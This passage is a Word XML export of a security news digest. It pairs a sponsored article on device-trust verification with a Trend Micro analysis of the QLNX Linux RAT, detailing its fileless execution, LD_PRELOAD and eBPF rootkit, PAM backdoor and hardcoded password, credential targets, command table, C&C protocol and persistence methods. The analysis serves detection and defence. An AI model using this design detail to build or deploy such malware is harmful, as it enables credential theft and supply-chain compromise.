and Noma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Help Net Security 2026.06.07 11:39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.helpnetsecurity.com/2026/06/07/week-in-review-cisco-sd-wan-0-day-exploited-june-2026-patch-tuesday-forecast/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Identity Alone Isn't Enough: Why Device Security Has to Share the Load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by Specops Software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May 20, 2026 10:02 AM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Identity has long been the load-bearing wall of cybersecurity. The logic was simple: verify the employee, secure the access. But as professionalized threat actors weaponize AI and sophisticated phishing kits, that wall is cracking. Identity is being forced to carry a structural burden it was never designed to support.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identity isn't obsolete, in ecosystems defined by SaaS sprawl, BYOD, and hybrid work, a valid credential is no longer a guarantee of a safe connection. The real danger is not authentication failure, but whether the right signals are being verified. Without real-time device checks, a legitimate login could just as easily be a compromised session. The post- authentication blind spot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Multi-factor authentication (MFA) was supposed to close this gap. However, phishing kits now let attackers sit between a user and the real login portal, proxying the authentication in real time and stealing the session token that gets issued after MFA succeeds. The victim completes every security check exactly as intended. The attacker walks away with the cookie that proves it.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NIST Special Publication 800-207, the foundational framework for Zero Trust architecture, anticipated this problem. It warns against relying on implied trustworthiness once a subject has met a base authentication level, and specifies that access decisions should account for whether the device used for the request has the proper security posture.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practice, most organizations still treat authentication as a one-time check. Identity is verified, MFA passes, a session begins, and trust holds until the token expires. But a session token in an attacker's browser looks identical to the same token in the user's browser. Traditional authentication logs cannot tell them apart.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Secure your Active Directory passwords with Specops Password Policy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Verizon's Data Breach Investigation Report found stolen credentials are involved in 44.7% of breaches.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Effortlessly secure Active Directory with compliant password policies, blocking 4+ billion compromised passwords, boosting security, and slashing support hassles! Try it for free Where Zero Trust breaks down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Zero Trust implementations have ended up heavily identity centric. They focus on strengthening authentication, enforcing MFA, reducing password reliance, and introducing risk-based sign-in policies. Device verification, meanwhile, is inconsistently applied. It often stops at the point of login, or it applies only to browser-based workflows inside modern conditional access frameworks. Legacy protocols, remote access tools, and API integrations tend to inherit trust implicitly once identity has been established.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result is a fragmented model. Personal and third-party devices may be loosely controlled or entirely unmanaged. Session trust persists even if device posture degrades mid-session. Identity signals and endpoint signals sit in separate tools with limited integration. Identity gets scrutinized heavily at login, and then access is rarely reassessed in any meaningful way. The device is the other half of the answer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stolen password used from an attacker-controlled laptop should not be treated the same as the same password used from an enrolled, encrypted, compliant corporate endpoint. Yet that is exactly what happens when identity alone governs access.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Device posture answers questions identity cannot. Is the device encrypted? Is endpoint protection active and healthy? Is the operating system patched? Has the configuration drifted from policy? Is this approved hardware?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importantly, those answers have to stay current beyond the initial login and across the entire session. An update can be delayed, endpoint protection can be disabled, unapproved software can be installed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Conditions at login are not conditions at hour three of a session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Continuous device verification reduces the value of stolen credentials and intercepted tokens, because access becomes bound not just to an identity, but to a trusted, healthy endpoint. Four principles for a stronger model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more defensible approach combines identity with continuous device verification. In practice, that looks like this: Continuously verify both the user and the device: Access should stay conditional on device health, not just identity proof. If endpoint protection is turned off or encryption is disabled mid-session, trust should adjust in real time. This reduces the effectiveness of stolen credentials, token replay, MFA fatigue, and attacker-operated endpoints in one move.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Bind access to approved hardware: Device-based controls let organizations enroll trusted hardware and differentiate between corporate, personal, and third-party endpoints. Valid credentials used from an unrecognized device should not simply proceed because MFA succeeded.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply proportionate enforcement: Rigid controls create workarounds. A mature posture strategy can apply conditional restrictions, reduced privileges, or time-bound grace periods instead of defaulting to a hard block. That balance matters for hybrid and remote teams.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable self-service remediation: If trust is tied to device health, users need a way to restore that trust. Guided fixes for encryption, OS updates, or endpoint protection let employees resolve posture issues without filing a ticket or losing access unnecessarily.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Solutions like Specops Device Trust operationalize this model by extending trust decisions beyond identity and maintaining enforcement as conditions change. It authenticates users and verifies their devices continuously across Windows, macOS, Linux, and mobile platforms, not just at the point of login.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Identity still matters. It just can no longer carry the full weight of an access decision on its own.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If you're looking to evolve your identity security strategy to include device trust, contact Specops today or book a demo to see how our solutions could work in your environment.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and written by Specops Software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2026.05.20 19:01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/identity-alone-isnt-enough-why-device-security-has-to-share-the-load/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Quasar Linux (QLNX) - A Silent Foothold in the Supply Chain: Inside a Full-Featured Linux RAT With Rootkit, PAM Backdoor, Credential Harvesting Capabilities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TrendAITM Research breaks down Quasar Linux (QLNX), a previously undocumented sophisticated Linux RAT with low detection rates. In this blog, we examine a full-featured Linux threat incorporating a rootkit, a PAM backdoor, credential harvesting, and more, revealing how this malware enables stealthy access, persistence, and potential supply-chain attacks.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Aliakbar Zahravi, Ahmed Mohamed Ibrahim May 04, 2026</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Key takeaways Quasar Linux RAT (QLNX) is a comprehensive Linux implant that combines remote access capabilities with advanced evasion, persistence, keylogging, and credential harvesting features. The malware carries embedded C source code for both its PAM backdoor and LD_PRELOAD rootkit as string literals within the binary. It dynamically compiles rootkit shared objects and PAM backdoor modules on the target host using gcc, then deploys them via /etc/ld.so.preload for system-wide interception.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>QLNX targets developers and DevOps credentials across the software supply chain. Its credential harvester extracts secrets from high-value files such as .npmrc (NPM tokens), .pypirc (PyPI credentials), .git-credentials, .aws/credentials, .kube/config, .docker/config.json, .vault-token, Terraform credentials, GitHub CLI tokens, and .env files. The compromise of these assets could allow the operator to push malicious packages to NPM or PyPI registries, access cloud infrastructure, or pivot through CI/CD pipelines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>QLNX incorporates a PAM backdoor with inline hooking, enabling plaintext credential interception during authentication. It uses the hardcoded master password O$$f$QtYJK and XOR-encrypted credential harvesting to /var/log/.ICE-unix.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>QLNX includes a P2P mesh capability that transforms individual implants into a resilient network, making complete eradication significantly more difficult.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Vision OneTM detects and blocks the specific indicators of compromise (IoCs) mentioned in this blog entry, and offers customers access to hunting queries, threat insights, and intelligence reports related to the QLNX RAT.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previous research, we have demonstrated how AI can be used to improve detection accuracy when new malware families emerge, particularly those that reuse or share code from open-source repositories. A clear example is our earlier work "AI-Automated Threat Hunting Brings GhostPenguin Out of the Shadows," where AI-driven threat hunting helped us expose the previously elusive GhostPenguin backdoor.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In this blog entry, we present another compelling finding from the same approach. Our platform recently flagged an unusual Linux implant with low detection, which caught our attention and prompted a deeper investigation. What followed was the discovery of Quasar Linux (QLNX), a previously undocumented Linux remote access trojan (RAT) with rootkit capabilities and a notably minimal detection footprint.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Threat landscape overview</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Supply-chain attacks targeting open-source package ecosystems like PyPI and npm have become one of the most effective attack vectors available to threat actors today. By compromising a maintainer's account through phishing, credential theft, or a misconfigured CI/CD pipeline, an attacker can inject malicious code into a legitimate and widely trusted package and instantly reach its entire audience - as seen in recent npm-focused compromises such as the axios package incident.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the open-source ecosystem is supported by a mix of enterprise teams and independent contributors, attackers frequently target the developer's workstation. Security controls across these decentralized endpoints can vary significantly, meaning not all workstations benefit from uniform, enterprise-grade solutions such as EDR, XDR, or advanced network monitoring. This variability creates potential blind spots that make certain developer endpoints highly attractive targets and, critically, makes it much harder to detect a breach after the fact - allowing attackers to maintain silent access for extended periods.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QLNX attack surface and impact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is precisely the threat environment that QLNX was built for. QLNX's credential harvesting module targets the files and tokens that provide authenticated access to development tools, package registries, and cloud environments: this includes AWS credentials and configuration files, Kubernetes service account tokens and kubeconfig files, Docker Hub credentials, Git configuration and access tokens, NPM authentication tokens, and PyPI API keys.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 attacker who successfully deploys QLNX against a package maintainer gains access to that maintainer's publishing pipeline. A single compromise can be silently leveraged to trojanize packages, inject backdoors into build artifacts, or pivot into cloud environments where production infrastructure lives.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 summarizes its complete capability set across eight operational categories.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Category Capabilities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Execution and evasion Fileless execution via memfd_create + execveat Self-deletion Process name spoofing Single-instance mutex</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Rootkit and hiding Two-tier rootkit architecture: userspace LD_PRELOAD hooks (readdir, stat, open, fopen) and kernel-level eBPF maps hiding PIDs, filenames, and TCP ports from the kernel directly.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Persistence systemd (system + user services) crontab @reboot init.d script XDG autostart .desktop files LD_PRELOAD bootstrap .so .bashrc injection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Credential and data harvesting SSH private keys Browser login databases (Chrome, Chromium, Firefox) Cloud configuration files (AWS, Kubernetes, Docker, Git, NPM, PyPI) Shell history (Bash, Zsh, MySQL, PSQL) Plaintext PAM passwords via pam_security.so hook; /etc/shadow (root) Clipboard content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Surveillance Keylogger (raw /dev/input events + X11 fallback) Screenshot capture Clipboard monitoring with SHA256 deduplication and periodic exfiltration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Networking and tunnelling TCP tunnel; port forwarding Port scanning; raw packet capture SSH lateral movement execution Peer-to-peer mesh network with routing table for agent-to-agent C&amp;C relay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Remote control Interactive PTY reverse shell Full file manager (list, read, write, rename, delete, mkdir) File upload/download; process listing and termination TCP connection listing and killing; power control (shutdown/reboot/suspend) Privilege escalation via Sudo/pkexec</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Advanced offensive In-memory .so reflective loading (memfd/shm/tmpfile) Process injection via /proc/pid/mem and ptrace Beacon Object File (BOF/COFF) in-memory execution Real-time filesystem event monitoring via inotify Timestamp manipulation (timestomping)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 Overview of QLNX capabilities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Quasar Linux (QLNX) analysis Property Value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Name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quasar-implant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MD5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70f70743f287a837d17c56933152a8a6</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SHA1</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b0f2c668cbdd63a871c90592b6c93e931115872e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SHA256</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ea1d34b21b739a6bbf89b3f7e67978005cf7f3eda612cefc7eac1c8ead7c5545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Magic</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ELF 64-bit LSB pie executable, x86-64</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File size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147.91 KB (151,464 bytes)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2. Identifying information on QLNX</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Summary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QLNX is a full-featured RAT that targets the Linux platform. The malware executes filelessly from memory, spoofs its process name, profiles the system to detect containerized environments, utilizes eBPF to hide specific processes, files, and network ports, and wipes system logs.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QLNX performs extensive data collection. It gathers system information, clipboard contents, shell history, SSH keys, Firefox browser profiles, and credentials via a malicious Pluggable Authentication Module (PAM) injected through ld.so.preload.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QLNX communicates with the attacker and sends the collected information via TLS (custom protocol over TLS), HTTPS, or HTTP. The malware contacts a remote server and receives commands. The supported commands allow the malware to execute shell commands, manage files, inject code into processes via /proc/pid/mem and ptrace, capture screenshots, log keystrokes, establish SOCKS proxies and TCP tunnels, manage a peer-to-peer mesh network, and execute Beacon Object Files (BOFs).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QLNX supports multiple persistence mechanisms across both user and system scopes. These include creating systemd services, adding crontab reboot entries, installing init.d scripts, deploying XDG autostart desktop files, modifying the user's .bashrc file, and injecting a shared object via the /etc/ld.so.preload file. These options allow the operator to adjust persistence based on the environment.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QLNX internal logic</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 QLNX internal architecture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Upon execution, QLNX copies itself into an in-memory file, re-executes from that memory copy, and deletes the original binary from disk, leaving no on- disk footprint. To achieve this, the malware first inspects readlink("/proc/self/exe") for substrings "memfd:" or "(deleted)" to determine if it is already running from memory.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Before performing this check, it reads the _MFD_RE environment variable, which serves as a re-execution guard. If the variable is set, it is cleared and the function returns immediately to prevent an infinite execution loop.</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If neither memory condition is met, the malware opens /proc/self/exe for reading and calls memfd_create (syscall 319) to create an anonymous RAM- backed file descriptor. The binary is then read in 8 KB chunks and written into the memory file descriptor. Once the copy is complete, the close-on- exec flag is cleared from the memory file descriptor via fcntl, the original binary is deleted from disk with unlink, and the environment variable _MFD_RE is set to "1" to signal the re-execution guard.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QLNX then attempts to re-execute itself directly from memory via execveat (syscall 322), passing the memory file descriptor directly. If that fails - such as on older kernels that do not support execveat - execution falls back to execv using the /proc/self/fd/&lt;memfd&gt; path.</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Following this, the malware profiles the infected host by reading system state and probing available resources. The results are stored in a set of global flags that govern which capabilities are available later in the session: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Flag Source Purpose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g_is_root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getuid() == 0</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Gates root-only capabilities throughout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g_kernel_version[2]</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uname()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Major and minor kernel version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g_memfd_supported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memfd_create syscall (319) probe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Required for fileless in-memory execution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g_has_proc_mem_write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Kernel (tm) 3.2 check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Indicates /proc/pid/mem is writable for process injection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g_yama_ptrace_scope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/proc/sys/kernel/yama/ptrace_scope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Governs whether ptrace-based injection is permitted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g_selinux_enforce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/sys/fs/selinux/enforce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Indicates whether SELinux is in enforcing mode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g_has_devinput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Readable event* device under /dev/input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Required for raw device keylogger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g_has_x11</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DISPLAY environment variable present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Required for X11 keylogger and screenshot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g_has_gcc</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Probe of /usr/bin/gcc, /usr/local/bin/gcc, /usr/bin/cc</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Required for LD_PRELOAD rootkit and PAM hook runtime compilation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g_is_containerized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/.dockerenv or /proc/1/cgroup contains docker, lxc, kubepods, containerd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Detects container runtime environment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3. QLNX runtime profiling flags used to detect host capabilities and selectively enable functionality based on privilege level, kernel features, security controls, and available tooling.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Name spoofing process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Next, the malware attempts to evade detection by randomly selecting one of the following fake kernel thread names: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Fake Name Legitimate Kernel Thread It Mimics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[kworker/0:0]</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Kernel worker thread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[kworker/u8:2]</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Unbound kernel worker thread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[migration/0]</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CPU migration thread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[ksoftirqd/0]</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Soft IRQ handler thread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[rcu_sched]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RCU scheduling thread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[watchdog/0]</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Kernel watchdog thread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4. Kernel thread name spoofing used by QLNX for process masquerading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QLNX applies the name consistently across three process metadata locations to ensure consistency across all process inspection tools: argv[0] overwrite - The entire original argument string in memory is zeroed and replaced with the chosen name. This changes what ps and /proc/pid/cmdline report.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>prctl(PR_SET_NAME) - Sets the kernel-visible thread name to the chosen name. This is what top and htop read from the scheduler.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>/proc/self/comm - The name is written directly to this file after stripping the surrounding [ and ] brackets and truncating to 15 bytes to comply with the kernel's TASK_COMM_LEN limit.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addition to process name spoofing, QLNX removes shell-populated environment variables that could reveal its original execution context. The malware clears the _ and OLDPWD variables via unsetenv. These variables are automatically populated by the shell at the moment it launches any process. _ is set to the full path of the executed binary, and OLDPWD is set to the previous working directory. Both values are stored in the process environment block and are readable by anyone with access to /proc/pid/environ, making them valuable forensic artifacts if left intact.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 prevent multiple instances from running simultaneously, the malware implements a single-instance mutex using file locking. It computes a DJB2 hash of the string "quasar_linux" (result: 0x752e2ca1) and constructs a lock file path disguised as an X11 socket lock: /tmp/.X752e2ca1-lock. This path is designed to blend in with legitimate X server lock files. The file is created using open(path, O_CREAT|O_RDWR, 0600), followed by an attempt to acquire an exclusive, non-blocking flock(fd, LOCK_EX|LOCK_NB). If the lock cannot be acquired - meaning another instance is already running - the process terminates immediately. When successful, the file descriptor is intentionally left open for the lifetime of the process, so the kernel holds the lock until the process exits.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its execution safeguards in place, QLNX then initializes its command dispatch mechanism by registering a large set of command handlers into a global handler table. Each entry maps a numeric command identifier to a corresponding routine, enabling the malware to dynamically route incoming C&amp;C instructions to the appropriate functionality.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typedef struct { __int16 command_id; char _pad[6]; void *handler; } command_handler_entry_t;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2. QLNX initiates commands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Once the malware completes its foothold and installation on the compromised system, it transitions into its primary operational phase, entering a persistent loop that continuously attempts to establish and maintain communication with the C&amp;C server.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implant supports multiple communication channels, including a custom TCP-based protocol over TLS, as well as HTTPS and HTTP protocols. In this sample, the configuration is set to use the custom TCP protocol. Upon a successful connection, it constructs and transmits an initial beacon packet (Command ID 1).</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beacon contains a serialized byte buffer including the malware version (1.4.1), OS version, privilege level (Admin or User), geolocation data (retrieved from ip-api.com), a unique machine fingerprint (SHA256 hash of the MAC address or /etc/machine-id), the current username, hostname, and active IPv4 interfaces.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If the connection fails or the C&amp;C server does not respond, the malware implements a randomized sleep mechanism to evade network beaconing detection. It calculates a base sleep time between 3,000 and 15,000 milliseconds using /dev/urandom, then applies a 30% jitter to this value, ensuring the sleep duration is unpredictable before attempting to reconnect.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following traffic is the initial decrypted beacon sent by the QLNX. We provide a more detailed breakdown in the "Network communication" section.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3. QLNX TCP handshake - SSL Decrypted packet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Once the C&amp;C connection is established and the beacon is acknowledged, the malware enters a blocking receive loop. The network protocol uses a 6-byte header consisting of a 4-byte little-endian payload length followed by a 2- byte command identifier. Upon receiving data, the malware reads this header, allocates memory for the incoming payload, and then routes the data through an internal dispatch mechanism which iterates over a table of registered handlers and executes the routine associated with the received command.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total, QLNX registers 58 distinct commands, covering a broad range of post-compromise functionality, including file system manipulation, network tunneling, credential harvesting, and rootkit management. The complete list of registered commands and their corresponding handlers is detailed in Table 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Command ID Description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0x10</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Spawns an interactive PTY shell (bash, zsh, or sh) and binds I/O to the C&amp;C</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0x20</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Parses /proc/mounts to enumerate mounted filesystems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0x22</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Enumerates files in a directory, returning names, sizes, and timestamps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0x24</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Deletes a file via unlink or recursively via /bin/rm -rf</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0x25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Renames or moves a file using the rename function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0x26</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Creates a new directory using mkdir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0x27</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Reads a file up to 10MB into memory and transmits it to the C&amp;C</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0x29</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Writes provided text data to a specified file path</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0x30</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Reads a file in 64KB chunks and streams it to the C&amp;C</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0x31</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Receives file chunks from the C&amp;C and writes them to disk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0x33</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Aborts an active file upload or download task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0x40</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Gathers CPU, RAM, GPU, disk usage, and network interface statistics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0x42</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Enumerates running processes by reading /proc/[pid]/comm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0x44</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Downloads a payload via curl/wget or executes a local binary via execvp</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0x45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Terminates a specified process using kill(pid, 9)</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0x50</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Parses /proc/net/tcp to list active network connections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0x52</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Terminates a specific TCP connection using ss --kill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0x60</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Reboots, suspends, or halts the system using shutdown or systemctl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0x61</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Sets the session reset flag to force a C&amp;C reconnection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0x62</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Identical to reconnect; tears down the current socket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0x63</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Triggers the self-destruct sequence, removing persistence and the binary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0x64</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Attempts to restart the malware as root using sudo or pkexec</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0x65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Opens a URL silently via curl/wget or visibly via xdg-open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0x66</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Displays a desktop notification using notify-send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0x70</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Scans systemd, crontab, init.d, bashrc, and ld.so.preload for malware entries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0x72</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Installs the malware into a specified persistence mechanism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0x73</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Removes the malware from a specified persistence mechanism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0x80</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Opens a raw TCP socket to a target host and port for proxying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0x82</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Sends raw data through an established TCP tunnel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0x83</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Closes an active TCP tunnel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0x90</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Extracts SSH keys, browser databases, cloud tokens, and clipboard data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0xA0</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Performs a multi-threaded TCP port scan against a target IP range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0xA2</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Captures the screen and sends the image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0xB0</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Starts capturing keystrokes via /dev/input or X11</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0xB1</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Stops the active keylogger thread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0xB3</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Injects shellcode into a target PID using ptrace or /proc/pid/mem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0xB5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Loads a shared object directly from memory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0xB7</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Executes commands on remote hosts using harvested SSH credentials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0xB9</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Parses SSH config and keys to map lateral movement targets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0xBB</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Injects a malicious PAM module to capture credentials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0xBD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Installs a user-space rootkit via /etc/ld.so.preload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0xC0</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Evaluates success probability of exploits/modules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0xD0</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Executes a Beacon Object File (BOF) in memory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0xD4</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Binds a local port and forwards traffic to a remote destination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0xD6</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Sends data through an active port forwarding rule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0xD7</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Closes an active port forwarding rule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0xD8</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Starts a SOCKS proxy server on the infected host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0xD9</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Stops the active SOCKS proxy server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0xDC</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Starts continuous clipboard and screen monitoring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0xDD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Stops continuous monitoring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0xE0</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Loads eBPF maps to hide PIDs, files, and network ports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0xE4</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Manages peer-to-peer routing tables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0xE6</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Sends file browser data through the P2P mesh network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0xE8</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Clears system logs (auth.log, syslog, wtmp, bash_history)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0xEA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Installs or removes the PAM authentication hook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0xEE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Sets up real-time filesystem monitoring on a given path using inotify (create, delete, modify, move)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0xEF</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Removes all active inotify watches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0xF2</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Modifies file timestamps using utimensat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5. List of registered commands and their corresponding handlers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Network communication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QLNX supports three transport backends: raw TCP, HTTPS, and HTTP. All three transports carry the same underlying binary command protocol. Both the TCP and HTTPS channels are secured using TLS, ensuring that command and data exchanges are encrypted during network communication.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QLNX magic identifier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All three transport modes begin their session by sending the 4-byte magic value 51 4C 4E 58, which spells "QLNX" in ASCII. This value serves as the protocol identifier and session initiator. Its role varies depending on the transport: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Transport How QLNX Magic Is Used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Custom TCP/TLS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Sent as the first 4 bytes of the Check-In packet, combined with the framing header and payload in a single TLS write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HTTPS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Sent as a standalone 4-byte HTTP POST body before the Check-In - server responds with a session cookie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HTTP</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Same as HTTPS but over plaintext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6. Role of the QLNX Magic Identifier across the three transport modes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Transport 1 - Raw TLS (Default)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is a fully custom binary protocol running directly over TLS. There is no HTTP layer involved. The implant connects to the C&amp;C, performs a TLS handshake with certificate validation disabled, and then exchanges length- prefixed binary frames.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session follows a strict 4-step handshake before entering the command loop:</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4. Four-step handshake sequence before entering the command loop</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Once this handshake completes, the session becomes fully interactive, supporting bidirectional command and response traffic.</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Figure 5, we show an example of malware communication to the C&amp;C server.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5. TCP full handshake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CheckIn packet is used to register the infected host with the C&amp;C and establish a session context, as illustrated in Figure 6.</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6. Check-in request packet structure.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HTTP/HTTPS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Although the analyzed version of QLNX communicates by default over encrypted TLS, it also supports HTTP and HTTPS as communications options. We successfully rebuilt the C&amp;C and emulated malware communications over HTTP for analysis.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packet structure remains identical across all three protocols. The malware uses POST requests to push data to the C&amp;C and GET requests to poll for incoming commands, with all traffic Base64-encoded before hitting the wire. Session tracking relies on a server-generated hex ID that gets passed redundantly in both the sid= URL parameter on GETs and the Cookie header on POSTs. A dedicated thread polls the C&amp;C every five seconds for new commands.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Before contacting the C&amp;C, the implant resolves the victim's geographic location by querying the public ip-api.com service. The country name and country code are included in the registration packet. QLNX then initiates contact by sending a POST request containing base64-encoded magic header "QLNX" to /api/v1/update. The handshake request does not contain the Cookie header. The C&amp;C responds with a session ID that tracks this victim for the rest of the session.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7. HTTP/HTTPS handshake and initial registration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Once connected, the malware registers itself with the C&amp;C by sending a registration packet containing a full system profile. Among the 13 fields is a machine fingerprint - a SHA hash computed from /etc/machine-id (falling back to /var/lib/dbus/machine-id), MAC addresses, CPU info, and hostname. This gives the C&amp;C a stable identifier for the victim even if the IP changes between sessions.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8. QLNX C&amp;C registration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registration, the polling thread kicks in and starts sending GET requests to the C&amp;C. On the next poll cycle, the server responds with an ACK packet indicating whether the registration was accepted. If the C&amp;C accepts, the implant fires back a two-part Confirmation - a split-packet that acts as a gate signal, telling the server "I'm ready, start sending commands." The C&amp;C must hold off on issuing any commands until it receives this confirmation.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Server authentication and command loop</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Once the acknowledge signal is sent, the malware enters its main command loop. The malware continues sending GET requests every 5 seconds. If the C&amp;C has a command, it responds with a Base64-encoded packet in the GET response body; otherwise, the response comes back empty and the implant waits for the next cycle.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9. Server authentication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When a command does arrive, the malware decodes and parses it, then looks up the command type in a handler table and routes it to the matching function. The handler executes locally, builds a response packet, and sends the result back to the C&amp;C. This loop runs until the connection drops or the C&amp;C sends a shutdown command.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10. HTTP/HTTPs command loop</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Persistence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QLNX supports seven persistence mechanisms. Table 7 shows all persistence techniques.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Type Method Artifact Path Privilege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Systemd system service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/etc/systemd/system/{name}.service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Root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.bashrc shell injection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~/.bashrc</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Crontab @reboot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crontab</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Systemd user service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~/.config/systemd/user/{name}.service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SysVinit init.d script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/etc/init.d/{name}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Root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LD_PRELOAD shared library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/etc/ld.so.preload / /usr/lib/libsecurity.so.1</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Root + gcc compiler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XDG desktop autostart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~/.config/autostart/{name}.desktop</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User + desktop</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7. QLNX persistence mechanisms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Persistence is entirely operator-controlled. The C&amp;C can issue a scan command to fingerprint the target's init system, privilege level, desktop environment, and toolchain availability, then the operator selects which methods to install. Methods can be stacked on a single host for layered survivability. Every persistence artifact - service files, crontab entries, shell lines, init scripts, desktop entries - contains the string QLNX_MANAGED embedded as a comment. The malware uses this to distinguish its own entries from legitimate system services during enumeration.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11. QLNX Persistence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LD_PRELOAD shared library persistence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LD_PRELOAD shared library is a sophisticated persistence method in the arsenal. Instead of writing configuration files or scripts, the malware compiles a shared library on the target host, causing the library to be loaded into every dynamically linked process on the system.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Unlike other 